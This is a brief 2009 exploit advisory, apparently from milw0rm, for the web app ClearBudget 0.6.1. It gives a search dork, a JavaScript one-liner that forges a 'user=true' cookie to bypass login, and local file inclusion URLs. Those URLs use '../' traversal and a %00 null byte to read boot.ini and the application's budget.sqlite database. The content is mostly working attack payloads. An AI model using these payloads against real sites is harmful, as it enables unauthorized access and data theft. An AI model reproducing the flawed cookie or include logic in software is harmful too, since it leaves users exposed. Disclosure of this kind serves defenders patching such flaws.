ClearBudget 0.6.1 Insecure Cookie Handling LFI Vulnerabilities.pdf

1 ############################################################################################# 2 [+] ClearBudget v0.6.1 Insecure Cookie Handling / LFI 3 [+] Discovered By SirGod 4 [+] www.mortal−team.org 5 [+] www.h4cky0u.org 6 [+] www.hellzone.info 7 [+] www.anti−intruders.org 8 ############################################################################################# 9 10 [+] Dork : ClearBudget v0.6.1 11 12 [+] Homepage : http://clearbudget.douteaud.com/ 13 14 15 [+] Insecure Cookie Handling 16 17 PoC : javascript:document.cookie = "user=true; path=/"; 18 19 Live Demo : http://clearbudget.douteaud.com/demo/0−6−1/ 20 21 22 [+] Local File Inclusion 23 24 Example : http://127.0.0.1/path/index.php?action=[Local File]%00 25 26 PoC : http://127.0.0.1/path/index.php?action=../../../../boot.ini%00 27 28 PoC 2 : http://127.0.0.1/path/index.php?action=../db/budget.sqlite%00 29 30 ############################################################################################# 31 32 # milw0rm.com [2009−02−05] Page 1/1 ClearBudget 0.6.1 Insecure Cookie Handling LFI Vulnerabilities SirGod 02/05/2009